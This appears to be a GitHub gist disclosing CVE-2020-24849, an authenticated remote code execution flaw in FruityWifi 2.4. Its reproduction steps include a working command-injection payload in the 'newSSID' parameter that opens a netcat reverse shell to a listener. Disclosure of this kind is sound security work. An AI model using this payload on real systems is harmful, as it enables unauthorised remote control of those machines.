Last active
November 3, 2020 09:20
-
-
Save harsh-bothra/f899045b16bbba264628d79d52c07c22 to your computer and use it in GitHub Desktop.
Revisions
-
harsh-bothra renamed this gist
Nov 3, 2020 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Nov 3, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,18 @@ Product: FruityWifi CVE: CVE-2020-24849 Version: (, 2.4) - Tested on version 2.4 Vulnerability: Remote Code Execution Vulnerability Description: A remote code execution vulnerability is identified in FruityWifi through 2.4.Due to improperly escaped shell metacharacters obtained from the POST request at the page_config_adv.php page, it is possible to perform remote code execution by an authenticated attacker. This is similar to CVE-2018-17317. # Steps to Reproduce: 1. Login with credentials to the application. 2. Go to "https://vuln_ip/scripts/page_config_adv.php". 3. Intercept the request then change request method to POST. 4. Add "newSSID" parameter in POST body and insert payload (newSSID=A\"B'C";rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.1+4441+>/tmp/f;#) and start nc listener on 4441 port. Note: In order to bypass, we need to satisfy the quotes then insert our payload. Send the request, you will be greeted with a shell.